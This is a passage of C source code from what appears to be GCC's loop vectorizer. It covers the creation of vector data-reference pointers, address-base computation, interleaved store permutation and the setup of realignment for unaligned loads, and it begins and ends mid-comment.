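may append a suffix such as ".7". */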
tree
vect_get_new_vect_var (tree type, enum vect_var_kind var_kind, const char *name)
{
const char *prefix;
tree new_vect_var;
switch (var_kind)
{
case vect_simple_var:
prefix = "vect";
break;
case vect_scalar_var:
prefix = "stmp";
break;
case vect_pointer_var:
prefix = "vectp";
break;
default:
gcc_unreachable ();
}
if (name)
{
char* tmp = concat (prefix, "_", name, NULL);
new_vect_var = create_tmp_reg (type, tmp);
free (tmp);
}
else
new_vect_var = create_tmp_reg (type, prefix);
return new_vect_var;
}
/* Duplicate ptr info and set alignment/misalignment on NAME from DR. */
static void
vect_duplicate_ssa_name_ptr_info (tree name, data_reference *dr,
stmt_vec_info stmt_info)
{
duplicate_ssa_name_ptr_info (name, DR_PTR_INFO (dr));
unsigned int align = TYPE_ALIGN_UNIT (STMT_VINFO_VECTYPE (stmt_info));
int misalign = DR_MISALIGNMENT (dr);
if (misalign == -1)
mark_ptr_info_alignment_unknown (SSA_NAME_PTR_INFO (name));
else
set_ptr_info_alignment (SSA_NAME_PTR_INFO (name), align, misalign);
}
/* Function vect_create_addr_base_for_vector_ref.
Create an expression that computes the address of the first memory location
that will be accessed for a data reference.
Input:
STMT: The statement containing the data reference.
NEW_STMT_LIST: Must be initialized to NULL_TREE or a statement list.
OFFSET: Optional. If supplied, it is added to the initial address.
LOOP: Specifies the loop nest relative to which the address should be computed.
For example, when the dataref is in an inner-loop nested in an
outer-loop that is now being vectorized, LOOP can be either the
outer-loop, or the inner-loop. The first memory location accessed
by the following dataref ('in' points to short):
for (i=0; i<N; i++)
for (j=0; j<M; j++)
s += in[i+j]
is as follows:
if LOOP=i_loop: &in (relative to i_loop)
if LOOP=j_loop: &in+i*2B (relative to j_loop)
BYTE_OFFSET: Optional, defaulted to NULL. If supplied, it is added to the
initial address. Unlike OFFSET, which is a number of elements to
be added, BYTE_OFFSET is measured in bytes.
Output:
1. Return an SSA_NAME whose value is the address of the memory location of
the first vector of the data reference.
2. If new_stmt_list is not NULL_TREE after return then the caller must insert
these statement(s) which define the returned SSA_NAME.
FORNOW: We are only handling array accesses with step 1. */
tree
vect_create_addr_base_for_vector_ref (gimple stmt,
gimple_seq *new_stmt_list,
tree offset,
struct loop *loop,
tree byte_offset)
{
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
struct data_reference *dr = STMT_VINFO_DATA_REF (stmt_info);
tree data_ref_base;
const char *base_name;
tree addr_base;
tree dest;
gimple_seq seq = NULL;
tree base_offset;
tree init;
tree vect_ptr_type;
tree step = TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (dr)));
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
if (loop_vinfo && loop && loop != (gimple_bb (stmt))->loop_father)
{
struct loop *outer_loop = LOOP_VINFO_LOOP (loop_vinfo);
gcc_assert (nested_in_vect_loop_p (outer_loop, stmt));
data_ref_base = unshare_expr (STMT_VINFO_DR_BASE_ADDRESS (stmt_info));
base_offset = unshare_expr (STMT_VINFO_DR_OFFSET (stmt_info));
init = unshare_expr (STMT_VINFO_DR_INIT (stmt_info));
}
else
{
data_ref_base = unshare_expr (DR_BASE_ADDRESS (dr));
base_offset = unshare_expr (DR_OFFSET (dr));
init = unshare_expr (DR_INIT (dr));
}
if (loop_vinfo)
base_name = get_name (data_ref_base);
else
{
base_offset = ssize_int (0);
init = ssize_int (0);
base_name = get_name (DR_REF (dr));
}
/* Create base_offset */
base_offset = size_binop (PLUS_EXPR,
fold_convert (sizetype, base_offset),
fold_convert (sizetype, init));
if (offset)
{
offset = fold_build2 (MULT_EXPR, sizetype,
fold_convert (sizetype, offset), step);
base_offset = fold_build2 (PLUS_EXPR, sizetype,
base_offset, offset);
}
if (byte_offset)
{
byte_offset = fold_convert (sizetype, byte_offset);
base_offset = fold_build2 (PLUS_EXPR, sizetype,
base_offset, byte_offset);
}
/* base + base_offset */
if (loop_vinfo)
addr_base = fold_build_pointer_plus (data_ref_base, base_offset);
else
{
addr_base = build1 (ADDR_EXPR,
build_pointer_type (TREE_TYPE (DR_REF (dr))),
unshare_expr (DR_REF (dr)));
}
vect_ptr_type = build_pointer_type (STMT_VINFO_VECTYPE (stmt_info));
addr_base = fold_convert (vect_ptr_type, addr_base);
dest = vect_get_new_vect_var (vect_ptr_type, vect_pointer_var, base_name);
addr_base = force_gimple_operand (addr_base, &seq, false, dest);
gimple_seq_add_seq (new_stmt_list, seq);
if (DR_PTR_INFO (dr)
&& TREE_CODE (addr_base) == SSA_NAME)
{
vect_duplicate_ssa_name_ptr_info (addr_base, dr, stmt_info);
if (offset || byte_offset)
mark_ptr_info_alignment_unknown (SSA_NAME_PTR_INFO (addr_base));
}
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location, "created ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, addr_base);
dump_printf (MSG_NOTE, "\n");
}
return addr_base;
}
/* Function vect_create_data_ref_ptr.
Create a new pointer-to-AGGR_TYPE variable (ap), that points to the first
location accessed in the loop by STMT, along with the def-use update
chain to appropriately advance the pointer through the loop iterations.
Also set aliasing information for the pointer. This pointer is used by
the callers to this function to create a memory reference expression for
vector load/store access.
Input:
1. STMT: a stmt that references memory. Expected to be of the form
GIMPLE_ASSIGN <name, data-ref> or
GIMPLE_ASSIGN <data-ref, name>.
2. AGGR_TYPE: the type of the reference, which should be either a vector
or an array.
3. AT_LOOP: the loop where the vector memref is to be created.
4. OFFSET (optional): an offset to be added to the initial address accessed
by the data-ref in STMT.
5. BSI: location where the new stmts are to be placed if there is no loop
6. ONLY_INIT: indicate if ap is to be updated in the loop, or remain
pointing to the initial address.
7. BYTE_OFFSET (optional, defaults to NULL): a byte offset to be added
to the initial address accessed by the data-ref in STMT. This is
similar to OFFSET, but OFFSET is counted in elements, while BYTE_OFFSET
in bytes.
Output:
1. Declare a new ptr to vector_type, and have it point to the base of the
data reference (the initial address accessed by the data reference).
For example, for vector of type V8HI, the following code is generated:
v8hi *ap;
ap = (v8hi *)initial_address;
if OFFSET is not supplied:
initial_address = &a[init];
if OFFSET is supplied:
initial_address = &a[init + OFFSET];
if BYTE_OFFSET is supplied:
initial_address = &a[init] + BYTE_OFFSET;
Return the initial_address in INITIAL_ADDRESS.
2. If ONLY_INIT is true, just return the initial pointer. Otherwise, also
update the pointer in each iteration of the loop.
Return the increment stmt that updates the pointer in PTR_INCR.
3. Set INV_P to true if the access pattern of the data reference in the
vectorized loop is invariant. Set it to false otherwise.
4. Return the pointer. */
tree
vect_create_data_ref_ptr (gimple stmt, tree aggr_type, struct loop *at_loop,
tree offset, tree *initial_address,
gimple_stmt_iterator *gsi, gimple *ptr_incr,
bool only_init, bool *inv_p, tree byte_offset)
{
const char *base_name;
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
struct loop *loop = NULL;
bool nested_in_vect_loop = false;
struct loop *containing_loop = NULL;
tree aggr_ptr_type;
tree aggr_ptr;
tree new_temp;
gimple vec_stmt;
gimple_seq new_stmt_list = NULL;
edge pe = NULL;
basic_block new_bb;
tree aggr_ptr_init;
struct data_reference *dr = STMT_VINFO_DATA_REF (stmt_info);
tree aptr;
gimple_stmt_iterator incr_gsi;
bool insert_after;
tree indx_before_incr, indx_after_incr;
gimple incr;
tree step;
bb_vec_info bb_vinfo = STMT_VINFO_BB_VINFO (stmt_info);
gcc_assert (TREE_CODE (aggr_type) == ARRAY_TYPE
|| TREE_CODE (aggr_type) == VECTOR_TYPE);
if (loop_vinfo)
{
loop = LOOP_VINFO_LOOP (loop_vinfo);
nested_in_vect_loop = nested_in_vect_loop_p (loop, stmt);
containing_loop = (gimple_bb (stmt))->loop_father;
pe = loop_preheader_edge (loop);
}
else
{
gcc_assert (bb_vinfo);
only_init = true;
*ptr_incr = NULL;
}
/* Check the step (evolution) of the load in LOOP, and record
whether it's invariant. */
if (nested_in_vect_loop)
step = STMT_VINFO_DR_STEP (stmt_info);
else
step = DR_STEP (STMT_VINFO_DATA_REF (stmt_info));
if (integer_zerop (step))
*inv_p = true;
else
*inv_p = false;
/* Create an expression for the first address accessed by this load
in LOOP. */
base_name = get_name (DR_BASE_ADDRESS (dr));
if (dump_enabled_p ())
{
tree dr_base_type = TREE_TYPE (DR_BASE_OBJECT (dr));
dump_printf_loc (MSG_NOTE, vect_location,
"create %s-pointer variable to type: ",
get_tree_code_name (TREE_CODE (aggr_type)));
dump_generic_expr (MSG_NOTE, TDF_SLIM, aggr_type);
if (TREE_CODE (dr_base_type) == ARRAY_TYPE)
dump_printf (MSG_NOTE, " vectorizing an array ref: ");
else if (TREE_CODE (dr_base_type) == VECTOR_TYPE)
dump_printf (MSG_NOTE, " vectorizing a vector ref: ");
else if (TREE_CODE (dr_base_type) == RECORD_TYPE)
dump_printf (MSG_NOTE, " vectorizing a record based array ref: ");
else
dump_printf (MSG_NOTE, " vectorizing a pointer ref: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_BASE_OBJECT (dr));
dump_printf (MSG_NOTE, "\n");
}
/* (1) Create the new aggregate-pointer variable.
Vector and array types inherit the alias set of their component
type by default so we need to use a ref-all pointer if the data
reference does not conflict with the created aggregated data
reference because it is not addressable. */
bool need_ref_all = false;
if (!alias_sets_conflict_p (get_alias_set (aggr_type),
get_alias_set (DR_REF (dr))))
need_ref_all = true;
/* Likewise for any of the data references in the stmt group. */
else if (STMT_VINFO_GROUP_SIZE (stmt_info) > 1)
{
gimple orig_stmt = STMT_VINFO_GROUP_FIRST_ELEMENT (stmt_info);
do
{
stmt_vec_info sinfo = vinfo_for_stmt (orig_stmt);
struct data_reference *sdr = STMT_VINFO_DATA_REF (sinfo);
if (!alias_sets_conflict_p (get_alias_set (aggr_type),
get_alias_set (DR_REF (sdr))))
{
need_ref_all = true;
break;
}
orig_stmt = STMT_VINFO_GROUP_NEXT_ELEMENT (sinfo);
}
while (orig_stmt);
}
aggr_ptr_type = build_pointer_type_for_mode (aggr_type, ptr_mode,
need_ref_all);
aggr_ptr = vect_get_new_vect_var (aggr_ptr_type, vect_pointer_var, base_name);
/* Note: If the dataref is in an inner-loop nested in LOOP, and we are
vectorizing LOOP (i.e., outer-loop vectorization), we need to create two
def-use update cycles for the pointer: one relative to the outer-loop
(LOOP), which is what steps (3) and (4) below do. The other is relative
to the inner-loop (which is the inner-most loop containing the dataref),
and this is done by step (5) below.
When vectorizing inner-most loops, the vectorized loop (LOOP) is also the
inner-most loop, and so steps (3),(4) work the same, and step (5) is
redundant. Steps (3),(4) create the following:
vp0 = &base_addr;
LOOP: vp1 = phi(vp0,vp2)
...
...
vp2 = vp1 + step
goto LOOP
If there is an inner-loop nested in loop, then step (5) will also be
applied, and an additional update in the inner-loop will be created:
vp0 = &base_addr;
LOOP: vp1 = phi(vp0,vp2)
...
inner: vp3 = phi(vp1,vp4)
vp4 = vp3 + inner_step
if () goto inner
...
vp2 = vp1 + step
if () goto LOOP */
/* (2) Calculate the initial address of the aggregate-pointer, and set
the aggregate-pointer to point to it before the loop. */
/* Create &(base[init_val+offset]) + byte_offset in the loop preheader. */
new_temp = vect_create_addr_base_for_vector_ref (stmt, &new_stmt_list,
offset, loop, byte_offset);
if (new_stmt_list)
{
if (pe)
{
new_bb = gsi_insert_seq_on_edge_immediate (pe, new_stmt_list);
gcc_assert (!new_bb);
}
else
gsi_insert_seq_before (gsi, new_stmt_list, GSI_SAME_STMT);
}
*initial_address = new_temp;
/* Create: p = (aggr_type *) initial_base */
if (TREE_CODE (new_temp) != SSA_NAME
|| !useless_type_conversion_p (aggr_ptr_type, TREE_TYPE (new_temp)))
{
vec_stmt = gimple_build_assign (aggr_ptr,
fold_convert (aggr_ptr_type, new_temp));
aggr_ptr_init = make_ssa_name (aggr_ptr, vec_stmt);
/* Copy the points-to information if it exists. */
if (DR_PTR_INFO (dr))
vect_duplicate_ssa_name_ptr_info (aggr_ptr_init, dr, stmt_info);
gimple_assign_set_lhs (vec_stmt, aggr_ptr_init);
if (pe)
{
new_bb = gsi_insert_on_edge_immediate (pe, vec_stmt);
gcc_assert (!new_bb);
}
else
gsi_insert_before (gsi, vec_stmt, GSI_SAME_STMT);
}
else
aggr_ptr_init = new_temp;
/* (3) Handle the updating of the aggregate-pointer inside the loop.
This is needed when ONLY_INIT is false, and also when AT_LOOP is the
inner-loop nested in LOOP (during outer-loop vectorization). */
/* No update in loop is required. */
if (only_init && (!loop_vinfo || at_loop == loop))
aptr = aggr_ptr_init;
else
{
/* The step of the aggregate pointer is the type size. */
tree iv_step = TYPE_SIZE_UNIT (aggr_type);
/* One exception to the above is when the scalar step of the load in
LOOP is zero. In this case the step here is also zero. */
if (*inv_p)
iv_step = size_zero_node;
else if (tree_int_cst_sgn (step) == -1)
iv_step = fold_build1 (NEGATE_EXPR, TREE_TYPE (iv_step), iv_step);
standard_iv_increment_position (loop, &incr_gsi, &insert_after);
create_iv (aggr_ptr_init,
fold_convert (aggr_ptr_type, iv_step),
aggr_ptr, loop, &incr_gsi, insert_after,
&indx_before_incr, &indx_after_incr);
incr = gsi_stmt (incr_gsi);
set_vinfo_for_stmt (incr, new_stmt_vec_info (incr, loop_vinfo, NULL));
/* Copy the points-to information if it exists. */
if (DR_PTR_INFO (dr))
{
vect_duplicate_ssa_name_ptr_info (indx_before_incr, dr, stmt_info);
vect_duplicate_ssa_name_ptr_info (indx_after_incr, dr, stmt_info);
}
if (ptr_incr)
*ptr_incr = incr;
aptr = indx_before_incr;
}
if (!nested_in_vect_loop || only_init)
return aptr;
/* (4) Handle the updating of the aggregate-pointer inside the inner-loop
nested in LOOP, if it exists. */
gcc_assert (nested_in_vect_loop);
if (!only_init)
{
standard_iv_increment_position (containing_loop, &incr_gsi,
&insert_after);
create_iv (aptr, fold_convert (aggr_ptr_type, DR_STEP (dr)), aggr_ptr,
containing_loop, &incr_gsi, insert_after, &indx_before_incr,
&indx_after_incr);
incr = gsi_stmt (incr_gsi);
set_vinfo_for_stmt (incr, new_stmt_vec_info (incr, loop_vinfo, NULL));
/* Copy the points-to information if it exists. */
if (DR_PTR_INFO (dr))
{
vect_duplicate_ssa_name_ptr_info (indx_before_incr, dr, stmt_info);
vect_duplicate_ssa_name_ptr_info (indx_after_incr, dr, stmt_info);
}
if (ptr_incr)
*ptr_incr = incr;
return indx_before_incr;
}
else
gcc_unreachable ();
}
/* Function bump_vector_ptr
Increment a pointer (to a vector type) by vector-size. If requested,
i.e. if PTR-INCR is given, then also connect the new increment stmt
to the existing def-use update-chain of the pointer, by modifying
the PTR_INCR as illustrated below:
The pointer def-use update-chain before this function:
DATAREF_PTR = phi (p_0, p_2)
....
PTR_INCR: p_2 = DATAREF_PTR + step
The pointer def-use update-chain after this function:
DATAREF_PTR = phi (p_0, p_2)
....
NEW_DATAREF_PTR = DATAREF_PTR + BUMP
....
PTR_INCR: p_2 = NEW_DATAREF_PTR + step
Input:
DATAREF_PTR - ssa_name of a pointer (to vector type) that is being updated
in the loop.
PTR_INCR - optional. The stmt that updates the pointer in each iteration of
the loop. The increment amount across iterations is expected
to be vector_size.
BSI - location where the new update stmt is to be placed.
STMT - the original scalar memory-access stmt that is being vectorized.
BUMP - optional. The offset by which to bump the pointer. If not given,
the offset is assumed to be vector_size.
Output: Return NEW_DATAREF_PTR as illustrated above.
*/
tree
bump_vector_ptr (tree dataref_ptr, gimple ptr_incr, gimple_stmt_iterator *gsi,
gimple stmt, tree bump)
{
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
struct data_reference *dr = STMT_VINFO_DATA_REF (stmt_info);
tree vectype = STMT_VINFO_VECTYPE (stmt_info);
tree update = TYPE_SIZE_UNIT (vectype);
gassign *incr_stmt;
ssa_op_iter iter;
use_operand_p use_p;
tree new_dataref_ptr;
if (bump)
update = bump;
new_dataref_ptr = copy_ssa_name (dataref_ptr);
incr_stmt = gimple_build_assign (new_dataref_ptr, POINTER_PLUS_EXPR,
dataref_ptr, update);
vect_finish_stmt_generation (stmt, incr_stmt, gsi);
/* Copy the points-to information if it exists. */
if (DR_PTR_INFO (dr))
{
duplicate_ssa_name_ptr_info (new_dataref_ptr, DR_PTR_INFO (dr));
mark_ptr_info_alignment_unknown (SSA_NAME_PTR_INFO (new_dataref_ptr));
}
if (!ptr_incr)
return new_dataref_ptr;
/* Update the vector-pointer's cross-iteration increment. */
FOR_EACH_SSA_USE_OPERAND (use_p, ptr_incr, iter, SSA_OP_USE)
{
tree use = USE_FROM_PTR (use_p);
if (use == dataref_ptr)
SET_USE (use_p, new_dataref_ptr);
else
gcc_assert (tree_int_cst_compare (use, update) == 0);
}
return new_dataref_ptr;
}
/* Function vect_create_destination_var.
Create a new temporary of type VECTYPE. */
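/* For example (illustrative): for a scalar destination sum_23 and a
vector VECTYPE, the new temporary is named "vect_sum_23"; if the
scalar SSA name has no user-visible name, "_<version>" is used
instead, giving e.g. "vect__23". */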
tree
vect_create_destination_var (tree scalar_dest, tree vectype)
{
tree vec_dest;
const char *name;
char *new_name;
tree type;
enum vect_var_kind kind;
kind = vectype ? vect_simple_var : vect_scalar_var;
type = vectype ? vectype : TREE_TYPE (scalar_dest);
gcc_assert (TREE_CODE (scalar_dest) == SSA_NAME);
name = get_name (scalar_dest);
if (name)
new_name = xasprintf ("%s_%u", name, SSA_NAME_VERSION (scalar_dest));
else
new_name = xasprintf ("_%u", SSA_NAME_VERSION (scalar_dest));
vec_dest = vect_get_new_vect_var (type, kind, new_name);
free (new_name);
return vec_dest;
}
/* Function vect_grouped_store_supported.
Returns TRUE if interleave high and interleave low permutations
are supported, and FALSE otherwise. */
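/* For example (illustrative): with nelt == 4 and a power-of-two group,
the two masks queried below are the interleave masks {0, 4, 1, 5}
(high) and {2, 6, 3, 7} (low); both must be accepted by
can_vec_perm_p for this function to return TRUE. */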
bool
vect_grouped_store_supported (tree vectype, unsigned HOST_WIDE_INT count)
{
machine_mode mode = TYPE_MODE (vectype);
/* vect_permute_store_chain requires the group size to be equal to 3 or
be a power of two. */
if (count != 3 && exact_log2 (count) == -1)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"the size of the group of accesses"
" is not a power of 2 or not eqaul to 3\n");
return false;
}
/* Check that the permutation is supported. */
if (VECTOR_MODE_P (mode))
{
unsigned int i, nelt = GET_MODE_NUNITS (mode);
unsigned char *sel = XALLOCAVEC (unsigned char, nelt);
if (count == 3)
{
unsigned int j0 = 0, j1 = 0, j2 = 0;
unsigned int i, j;
for (j = 0; j < 3; j++)
{
int nelt0 = ((3 - j) * nelt) % 3;
int nelt1 = ((3 - j) * nelt + 1) % 3;
int nelt2 = ((3 - j) * nelt + 2) % 3;
for (i = 0; i < nelt; i++)
{
if (3 * i + nelt0 < nelt)
sel[3 * i + nelt0] = j0++;
if (3 * i + nelt1 < nelt)
sel[3 * i + nelt1] = nelt + j1++;
if (3 * i + nelt2 < nelt)
sel[3 * i + nelt2] = 0;
}
if (!can_vec_perm_p (mode, false, sel))
{
if (dump_enabled_p ())
dump_printf (MSG_MISSED_OPTIMIZATION,
"permutaion op not supported by target.\n");
return false;
}
for (i = 0; i < nelt; i++)
{
if (3 * i + nelt0 < nelt)
sel[3 * i + nelt0] = 3 * i + nelt0;
if (3 * i + nelt1 < nelt)
sel[3 * i + nelt1] = 3 * i + nelt1;
if (3 * i + nelt2 < nelt)
sel[3 * i + nelt2] = nelt + j2++;
}
if (!can_vec_perm_p (mode, false, sel))
{
if (dump_enabled_p ())
dump_printf (MSG_MISSED_OPTIMIZATION,
"permutaion op not supported by target.\n");
return false;
}
}
return true;
}
else
{
/* If length is not equal to 3 then only a power of 2 is supported. */
gcc_assert (exact_log2 (count) != -1);
for (i = 0; i < nelt / 2; i++)
{
sel[i * 2] = i;
sel[i * 2 + 1] = i + nelt;
}
if (can_vec_perm_p (mode, false, sel))
{
for (i = 0; i < nelt; i++)
sel[i] += nelt / 2;
if (can_vec_perm_p (mode, false, sel))
return true;
}
}
}
if (dump_enabled_p ())
dump_printf (MSG_MISSED_OPTIMIZATION,
"permutaion op not supported by target.\n");
return false;
}
/* Return TRUE if vec_store_lanes is available for COUNT vectors of
type VECTYPE. */
bool
vect_store_lanes_supported (tree vectype, unsigned HOST_WIDE_INT count)
{
return vect_lanes_optab_supported_p ("vec_store_lanes",
vec_store_lanes_optab,
vectype, count);
}
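/* (Illustrative, target-specific note: on AArch64, for example,
vec_store_lanes is typically implemented by the ST2/ST3/ST4
structure-store instructions; availability depends entirely on the
target.) */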
/* Function vect_permute_store_chain.
Given a chain of interleaved stores in DR_CHAIN of LENGTH that must be
a power of 2 or equal to 3, generate interleave_high/low stmts to reorder
the data correctly for the stores. Return the final references for stores
in RESULT_CHAIN.
E.g., LENGTH is 4 and the scalar type is short, i.e., VF is 8.
The input is 4 vectors each containing 8 elements. We assign a number to
each element, the input sequence is:
1st vec: 0 1 2 3 4 5 6 7
2nd vec: 8 9 10 11 12 13 14 15
3rd vec: 16 17 18 19 20 21 22 23
4th vec: 24 25 26 27 28 29 30 31
The output sequence should be:
1st vec: 0 8 16 24 1 9 17 25
2nd vec: 2 10 18 26 3 11 19 27
3rd vec: 4 12 20 28 5 13 21 29
4th vec: 6 14 22 30 7 15 23 31
i.e., we interleave the contents of the four vectors in their order.
We use interleave_high/low instructions to create such output. The input of
each interleave_high/low operation is two vectors:
1st vec 2nd vec
0 1 2 3 4 5 6 7
the even elements of the result vector are obtained left-to-right from the
high/low elements of the first vector. The odd elements of the result are
obtained left-to-right from the high/low elements of the second vector.
The output of interleave_high will be: 0 4 1 5
and of interleave_low: 2 6 3 7
The permutation is done in log LENGTH stages. In each stage interleave_high
and interleave_low stmts are created for each pair of vectors in DR_CHAIN,
where the first argument is taken from the first half of DR_CHAIN and the
second argument from its second half.
In our example,
I1: interleave_high (1st vec, 3rd vec)
I2: interleave_low (1st vec, 3rd vec)
I3: interleave_high (2nd vec, 4th vec)
I4: interleave_low (2nd vec, 4th vec)
The output for the first stage is:
I1: 0 16 1 17 2 18 3 19
I2: 4 20 5 21 6 22 7 23
I3: 8 24 9 25 10 26 11 27
I4: 12 28 13 29 14 30 15 31
The output of the second stage, i.e. the final result is:
I1: 0 8 16 24 1 9 17 25
I2: 2 10 18 26 3 11 19 27
I3: 4 12 20 28 5 13 21 29
I4: 6 14 22 30 7 15 23 31. */
void
vect_permute_store_chain (vec<tree> dr_chain,
unsigned int length,
gimple stmt,
gimple_stmt_iterator *gsi,
vec<tree> *result_chain)
{
tree vect1, vect2, high, low;
gimple perm_stmt;
tree vectype = STMT_VINFO_VECTYPE (vinfo_for_stmt (stmt));
tree perm_mask_low, perm_mask_high;
tree data_ref;
tree perm3_mask_low, perm3_mask_high;
unsigned int i, n, log_length = exact_log2 (length);
unsigned int j, nelt = TYPE_VECTOR_SUBPARTS (vectype);
unsigned char *sel = XALLOCAVEC (unsigned char, nelt);
result_chain->quick_grow (length);
memcpy (result_chain->address (), dr_chain.address (),
length * sizeof (tree));
if (length == 3)
{
unsigned int j0 = 0, j1 = 0, j2 = 0;
for (j = 0; j < 3; j++)
{
int nelt0 = ((3 - j) * nelt) % 3;
int nelt1 = ((3 - j) * nelt + 1) % 3;
int nelt2 = ((3 - j) * nelt + 2) % 3;
for (i = 0; i < nelt; i++)
{
if (3 * i + nelt0 < nelt)
sel[3 * i + nelt0] = j0++;
if (3 * i + nelt1 < nelt)
sel[3 * i + nelt1] = nelt + j1++;
if (3 * i + nelt2 < nelt)
sel[3 * i + nelt2] = 0;
}
perm3_mask_low = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0; i < nelt; i++)
{
if (3 * i + nelt0 < nelt)
sel[3 * i + nelt0] = 3 * i + nelt0;
if (3 * i + nelt1 < nelt)
sel[3 * i + nelt1] = 3 * i + nelt1;
if (3 * i + nelt2 < nelt)
sel[3 * i + nelt2] = nelt + j2++;
}
perm3_mask_high = vect_gen_perm_mask_checked (vectype, sel);
vect1 = dr_chain[0];
vect2 = dr_chain[1];
/* Create interleaving stmt:
low = VEC_PERM_EXPR <vect1, vect2,
{j, nelt, *, j + 1, nelt + j + 1, *,
j + 2, nelt + j + 2, *, ...}> */
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle3_low");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR, vect1,
vect2, perm3_mask_low);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
vect1 = data_ref;
vect2 = dr_chain[2];
/* Create interleaving stmt:
low = VEC_PERM_EXPR <vect1, vect2,
{0, 1, nelt + j, 3, 4, nelt + j + 1,
6, 7, nelt + j + 2, ...}> */
data_ref = make_temp_ssa_name (vectype, NULL, "vect_shuffle3_high");
perm_stmt = gimple_build_assign (data_ref, VEC_PERM_EXPR, vect1,
vect2, perm3_mask_high);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[j] = data_ref;
}
}
else
{
/* If length is not equal to 3 then only a power of 2 is supported. */
gcc_assert (exact_log2 (length) != -1);
for (i = 0, n = nelt / 2; i < n; i++)
{
sel[i * 2] = i;
sel[i * 2 + 1] = i + nelt;
}
perm_mask_high = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0; i < nelt; i++)
sel[i] += nelt / 2;
perm_mask_low = vect_gen_perm_mask_checked (vectype, sel);
for (i = 0, n = log_length; i < n; i++)
{
for (j = 0; j < length/2; j++)
{
vect1 = dr_chain[j];
vect2 = dr_chain[j+length/2];
/* Create interleaving stmt:
high = VEC_PERM_EXPR <vect1, vect2, {0, nelt, 1, nelt+1,
...}> */
high = make_temp_ssa_name (vectype, NULL, "vect_inter_high");
perm_stmt = gimple_build_assign (high, VEC_PERM_EXPR, vect1,
vect2, perm_mask_high);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[2*j] = high;
/* Create interleaving stmt:
low = VEC_PERM_EXPR <vect1, vect2,
{nelt/2, nelt*3/2, nelt/2+1, nelt*3/2+1,
...}> */
low = make_temp_ssa_name (vectype, NULL, "vect_inter_low");
perm_stmt = gimple_build_assign (low, VEC_PERM_EXPR, vect1,
vect2, perm_mask_low);
vect_finish_stmt_generation (stmt, perm_stmt, gsi);
(*result_chain)[2*j+1] = low;
}
memcpy (dr_chain.address (), result_chain->address (),
length * sizeof (tree));
}
}
}
/* Function vect_setup_realignment
This function is called when vectorizing an unaligned load using
the dr_explicit_realign[_optimized] scheme.
This function generates the following code at the loop prolog:
p = initial_addr;
x msq_init = *(floor(p)); # prolog load
realignment_token = call target_builtin;
loop:
x msq = phi (msq_init, ---)
The stmts marked with x are generated only for the case of
dr_explicit_realign_optimized.
The code above sets up a new (vector) pointer, pointing to the first
location accessed by STMT, and a "floor-aligned" load using that pointer.
It also generates code to compute the "realignment-token" (if the relevant
target hook was defined), and creates a phi-node at the loop-header bb
whose arguments are the result of the prolog-load (created by this
function) and the result of a load that takes place in the loop (to be
created by the caller to this function).
For the case of dr_explicit_realign_optimized:
The caller to this function uses the phi-result (msq) to create the
realignment code inside the loop, and sets up the missing phi argument,
as follows:
loop:
msq = phi (msq_init, lsq)
lsq = *(floor(p')); # load in loop
result = realign_load (msq, lsq, realignment_token);
For the case of dr_explicit_realign:
loop:
msq = *(floor(p)); # load in loop
p' = p + (VS-1);
lsq = *(floor(p')); # load in loop
result = realign_load (msq, lsq, realignment_token);
Input:
STMT - (scalar) load stmt to be vectorized. This load accesses
a memory location that may be unaligned.
BSI - place where new code is to be inserted.
ALIGNMENT_SUPPORT_SCHEME - which of the two misalignment handling schemes
is used.
Output:
REALIGNMENT_TOKEN - the result of a call to the builtin_mask_for_load
target hook, if defined.
Return value - the result of the loop-header phi node. */
tree
vect_setup_realignment (gimple stmt, gimple_stmt_iterator *gsi,
tree *realignment_token,
enum dr_alignment_support alignment_support_scheme,
tree init_addr,
struct loop **at_loop)
{
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
tree vectype = STMT_VINFO_VECTYPE (stmt_info);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
struct data_reference *dr = STMT_VINFO_DATA_REF (stmt_info);
struct loop *loop = NULL;
edge pe = NULL;
tree scalar_dest = gimple_assign_lhs (stmt);
tree vec_dest;
gimple inc;
tree ptr;
tree data_ref;
basic_block new_bb;
tree msq_init = NULL_TREE;
tree new_temp;
gphi *phi_stmt;
tree msq = NULL_TREE;
gimple_seq stmts = NULL;
bool inv_p;
bool compute_in_loop = false;
bool nested_in_vect_loop = false;
struct loop *containing_loop = (gimple_bb (stmt))->loop_father;
struct loop *loop_for_initial_load = NULL;
if (loop_vinfo)
{
loop = LOOP_VINFO_LOOP (loop_vinfo);
nested_in_vect_loop = nested_in_vect_loop_p (loop, stmt);
}
gcc_assert (alignment_support_scheme == dr_explicit_realign
|| alignment_support_scheme == dr_explicit_realign_optimized);
/* We need to generate three things:
1. the misalignment computation
2. the extra vector load (for the optimized realignment scheme).
3. the phi node for the two vectors from which the realignment is
done (for the optimized realignment scheme). */
/* 1. Determine where to generate the misalignment computation.
If INIT_ADDR is NULL_TREE, this indicates that the misalignment
calculation will be generated by this function, outside the loop (in the
preheader). Otherwise, INIT_ADDR had already been computed for us by the
caller, inside the loop.
Background: If the misalignment remains fixed throughout the iterations of
the loop, then both realignment schemes are applicable, and also the
misalignment computation can be done outside LOOP. This is because we are
vectorizing LOOP, and so the memory accesses in LOOP advance in steps that
are a multiple of VS (the Vector Size), and therefore the misalignment in
different vectorized LOOP iterations is always the same.
The problem arises only if the memory access is in an inner-loop nested
inside LOOP, which is now being vectorized using outer-loop vectorization.
This is the only case when the misalignment of the memory access may not
remain fixed throughout the iterations of the inner-loop (as explained in
